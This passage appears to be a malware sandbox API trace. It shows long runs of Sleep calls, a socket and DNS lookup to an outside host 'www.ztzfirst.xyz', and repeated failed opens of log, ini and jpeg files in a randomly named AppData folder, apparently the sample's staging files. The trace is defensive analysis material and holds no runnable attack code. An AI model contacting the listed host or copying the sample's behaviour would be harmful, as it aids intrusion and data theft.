(dwMilliseconds=0x7d0) [0189.963] Sleep (dwMilliseconds=0x7d0) [0189.964] Sleep (dwMilliseconds=0x7d0) [0189.966] Sleep (dwMilliseconds=0x7d0) [0189.967] Sleep (dwMilliseconds=0x7d0) [0189.969] Sleep (dwMilliseconds=0x7d0) [0189.970] Sleep (dwMilliseconds=0x7d0) [0189.972] Sleep (dwMilliseconds=0x7d0) [0189.973] Sleep (dwMilliseconds=0x7d0) [0189.975] Sleep (dwMilliseconds=0x7d0) [0189.976] Sleep (dwMilliseconds=0x7d0) [0189.978] Sleep (dwMilliseconds=0x7d0) [0189.979] Sleep (dwMilliseconds=0x7d0) [0189.981] Sleep (dwMilliseconds=0x7d0) [0189.982] Sleep (dwMilliseconds=0x7d0) [0189.984] Sleep (dwMilliseconds=0x7d0) [0189.985] Sleep (dwMilliseconds=0x7d0) [0189.987] Sleep (dwMilliseconds=0x7d0) [0189.988] Sleep (dwMilliseconds=0x7d0) [0189.990] Sleep (dwMilliseconds=0x7d0) [0189.991] Sleep (dwMilliseconds=0x7d0) [0189.993] Sleep (dwMilliseconds=0x7d0) [0189.994] Sleep (dwMilliseconds=0x7d0) [0189.996] Sleep (dwMilliseconds=0x7d0) [0189.997] Sleep (dwMilliseconds=0x7d0) [0189.999] Sleep (dwMilliseconds=0x7d0) [0190.000] Sleep (dwMilliseconds=0x7d0) [0190.002] Sleep (dwMilliseconds=0x7d0) [0190.003] Sleep (dwMilliseconds=0x7d0) [0190.005] Sleep (dwMilliseconds=0x7d0) [0190.006] Sleep (dwMilliseconds=0x7d0) [0190.008] Sleep (dwMilliseconds=0x7d0) [0190.009] Sleep (dwMilliseconds=0x7d0) [0190.011] Sleep (dwMilliseconds=0x7d0) [0190.012] Sleep (dwMilliseconds=0x7d0) [0190.015] Sleep (dwMilliseconds=0x7d0) [0190.016] Sleep (dwMilliseconds=0x7d0) [0190.017] Sleep (dwMilliseconds=0x7d0) [0190.019] Sleep (dwMilliseconds=0x7d0) [0190.020] Sleep (dwMilliseconds=0x7d0) [0190.022] Sleep (dwMilliseconds=0x7d0) [0190.023] Sleep (dwMilliseconds=0x7d0) [0190.025] Sleep (dwMilliseconds=0x7d0) [0190.026] Sleep (dwMilliseconds=0x7d0) [0190.028] Sleep (dwMilliseconds=0x7d0) [0190.029] Sleep (dwMilliseconds=0x7d0) [0190.031] Sleep (dwMilliseconds=0x7d0) [0190.032] Sleep (dwMilliseconds=0x7d0) [0190.034] Sleep (dwMilliseconds=0x7d0) [0190.035] Sleep (dwMilliseconds=0x7d0) [0190.037] Sleep (dwMilliseconds=0x7d0) [0190.038] Sleep (dwMilliseconds=0x7d0) [0190.040] Sleep (dwMilliseconds=0x7d0) [0190.041] Sleep (dwMilliseconds=0x7d0) [0190.043] Sleep (dwMilliseconds=0x7d0) [0190.044] Sleep (dwMilliseconds=0x7d0) [0190.046] Sleep (dwMilliseconds=0x7d0) [0190.047] Sleep (dwMilliseconds=0x7d0) [0190.049] Sleep (dwMilliseconds=0x7d0) [0190.050] Sleep (dwMilliseconds=0x7d0) [0190.052] Sleep (dwMilliseconds=0x7d0) [0190.053] Sleep (dwMilliseconds=0x7d0) [0190.055] Sleep (dwMilliseconds=0x7d0) [0190.056] Sleep (dwMilliseconds=0x7d0) [0190.058] Sleep (dwMilliseconds=0x7d0) [0190.059] Sleep (dwMilliseconds=0x7d0) [0190.061] Sleep (dwMilliseconds=0x7d0) [0190.062] Sleep (dwMilliseconds=0x7d0) [0190.064] Sleep (dwMilliseconds=0x7d0) [0190.065] Sleep (dwMilliseconds=0x7d0) [0190.067] Sleep (dwMilliseconds=0x7d0) [0190.068] Sleep (dwMilliseconds=0x7d0) [0190.070] Sleep (dwMilliseconds=0x7d0) [0190.071] Sleep (dwMilliseconds=0x7d0) [0190.073] Sleep (dwMilliseconds=0x7d0) [0190.074] Sleep (dwMilliseconds=0x7d0) [0190.076] Sleep (dwMilliseconds=0x7d0) [0190.077] Sleep (dwMilliseconds=0x7d0) [0190.079] Sleep (dwMilliseconds=0x7d0) [0190.080] Sleep (dwMilliseconds=0x7d0) [0190.082] Sleep (dwMilliseconds=0x7d0) [0190.083] Sleep (dwMilliseconds=0x7d0) [0190.085] Sleep (dwMilliseconds=0x7d0) [0190.086] Sleep (dwMilliseconds=0x7d0) [0190.088] Sleep (dwMilliseconds=0x7d0) [0190.089] Sleep (dwMilliseconds=0x7d0) [0190.091] Sleep (dwMilliseconds=0x7d0) [0190.092] Sleep (dwMilliseconds=0x7d0) [0190.094] Sleep (dwMilliseconds=0x7d0) [0190.095] Sleep (dwMilliseconds=0x7d0) [0190.097] Sleep (dwMilliseconds=0x7d0) [0190.098] Sleep (dwMilliseconds=0x7d0) [0190.100] Sleep (dwMilliseconds=0x7d0) [0190.101] Sleep (dwMilliseconds=0x7d0) [0190.103] Sleep (dwMilliseconds=0x7d0) [0190.104] Sleep (dwMilliseconds=0x7d0) [0190.106] Sleep (dwMilliseconds=0x7d0) [0190.107] Sleep (dwMilliseconds=0x7d0) [0190.109] Sleep (dwMilliseconds=0x7d0) [0190.110] Sleep (dwMilliseconds=0x7d0) [0190.112] Sleep (dwMilliseconds=0x7d0) [0190.113] Sleep (dwMilliseconds=0x7d0) [0190.116] Sleep (dwMilliseconds=0x7d0) [0190.117] Sleep (dwMilliseconds=0x7d0) [0190.119] Sleep (dwMilliseconds=0x7d0) [0190.120] Sleep (dwMilliseconds=0x7d0) [0190.122] Sleep (dwMilliseconds=0x7d0) [0190.123] Sleep (dwMilliseconds=0x7d0) [0190.125] Sleep (dwMilliseconds=0x7d0) [0190.126] Sleep (dwMilliseconds=0x7d0) [0190.128] Sleep (dwMilliseconds=0x7d0) [0190.129] Sleep (dwMilliseconds=0x7d0) [0190.131] Sleep (dwMilliseconds=0x7d0) [0190.132] Sleep (dwMilliseconds=0x7d0) [0190.134] Sleep (dwMilliseconds=0x7d0) [0190.135] Sleep (dwMilliseconds=0x7d0) [0190.137] Sleep (dwMilliseconds=0x7d0) [0190.138] Sleep (dwMilliseconds=0x7d0) [0190.140] Sleep (dwMilliseconds=0x7d0) [0190.141] Sleep (dwMilliseconds=0x7d0) [0190.143] Sleep (dwMilliseconds=0x7d0) [0190.144] Sleep (dwMilliseconds=0x7d0) [0190.146] Sleep (dwMilliseconds=0x7d0) [0190.147] Sleep (dwMilliseconds=0x7d0) [0190.149] Sleep (dwMilliseconds=0x7d0) [0190.150] Sleep (dwMilliseconds=0x7d0) [0190.152] Sleep (dwMilliseconds=0x7d0) [0190.153] Sleep (dwMilliseconds=0x7d0) [0190.155] Sleep (dwMilliseconds=0x7d0) [0190.156] Sleep (dwMilliseconds=0x7d0) [0190.158] Sleep (dwMilliseconds=0x7d0) [0190.159] Sleep (dwMilliseconds=0x7d0) [0190.161] Sleep (dwMilliseconds=0x7d0) [0190.162] Sleep (dwMilliseconds=0x7d0) [0190.164] Sleep (dwMilliseconds=0x7d0) [0190.165] Sleep (dwMilliseconds=0x7d0) [0190.167] Sleep (dwMilliseconds=0x7d0) [0190.168] Sleep (dwMilliseconds=0x7d0) [0190.170] Sleep (dwMilliseconds=0x7d0) [0190.171] Sleep (dwMilliseconds=0x7d0) [0190.173] Sleep (dwMilliseconds=0x7d0) [0190.174] Sleep (dwMilliseconds=0x7d0) [0190.176] Sleep (dwMilliseconds=0x7d0) [0190.177] Sleep (dwMilliseconds=0x7d0) [0190.179] Sleep (dwMilliseconds=0x7d0) [0190.180] Sleep (dwMilliseconds=0x7d0) [0190.182] Sleep (dwMilliseconds=0x7d0) [0190.183] Sleep (dwMilliseconds=0x7d0) [0190.185] Sleep (dwMilliseconds=0x7d0) [0190.186] Sleep (dwMilliseconds=0x7d0) [0190.188] Sleep (dwMilliseconds=0x7d0) [0190.189] Sleep (dwMilliseconds=0x7d0) [0190.191] Sleep (dwMilliseconds=0x7d0) [0190.192] Sleep (dwMilliseconds=0x7d0) [0190.194] Sleep (dwMilliseconds=0x7d0) [0190.195] Sleep (dwMilliseconds=0x7d0) [0190.197] Sleep (dwMilliseconds=0x7d0) [0190.198] Sleep (dwMilliseconds=0x7d0) [0190.200] Sleep (dwMilliseconds=0x7d0) [0190.201] Sleep (dwMilliseconds=0x7d0) [0190.203] Sleep (dwMilliseconds=0x7d0) [0190.204] Sleep (dwMilliseconds=0x7d0) [0190.206] Sleep (dwMilliseconds=0x7d0) [0190.207] Sleep (dwMilliseconds=0x7d0) [0190.209] Sleep (dwMilliseconds=0x7d0) [0190.210] Sleep (dwMilliseconds=0x7d0) [0190.212] Sleep (dwMilliseconds=0x7d0) [0190.213] Sleep (dwMilliseconds=0x7d0) [0190.216] Sleep (dwMilliseconds=0x7d0) [0190.217] Sleep (dwMilliseconds=0x7d0) [0190.219] Sleep (dwMilliseconds=0x7d0) [0190.220] Sleep (dwMilliseconds=0x7d0) [0190.222] Sleep (dwMilliseconds=0x7d0) [0190.223] Sleep (dwMilliseconds=0x7d0) [0190.225] Sleep (dwMilliseconds=0x7d0) [0190.226] Sleep (dwMilliseconds=0x7d0) [0190.228] Sleep (dwMilliseconds=0x7d0) [0190.229] Sleep (dwMilliseconds=0x7d0) [0190.231] Sleep (dwMilliseconds=0x7d0) [0190.232] Sleep (dwMilliseconds=0x7d0) [0190.234] Sleep (dwMilliseconds=0x7d0) [0190.235] Sleep (dwMilliseconds=0x7d0) [0190.237] Sleep (dwMilliseconds=0x7d0) [0190.238] Sleep (dwMilliseconds=0x7d0) [0190.240] Sleep (dwMilliseconds=0x7d0) [0190.241] Sleep (dwMilliseconds=0x7d0) [0190.243] socket (af=2, type=1, protocol=6) returned 0x24c0 [0190.243] getaddrinfo (in: pNodeName="www.ztzfirst.xyz", pServiceName="80", pHints=0x878faf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878fb28 | out: ppResult=0x878fb28*=0x0) returned 11001 [0190.779] Sleep (dwMilliseconds=0x7d0) [0190.780] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.780] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.781] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0190.781] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8950150) returned 1 [0190.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.781] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.783] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.783] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.783] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.783] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.783] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.783] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.783] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.783] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.784] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fdf0) returned 1 [0190.784] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.784] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.784] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.784] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0190.784] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.784] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.784] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.784] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fe80) returned 1 [0190.784] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.784] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.784] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.784] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fe80) returned 1 [0190.784] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.784] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.784] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.784] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ee30) returned 1 [0190.784] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.784] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.785] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.785] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8950150) returned 1 [0190.785] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.785] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.785] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.785] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.785] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.785] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.785] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0190.785] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.785] Sleep (dwMilliseconds=0x7d0) [0190.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.786] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.786] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0190.787] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.787] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, 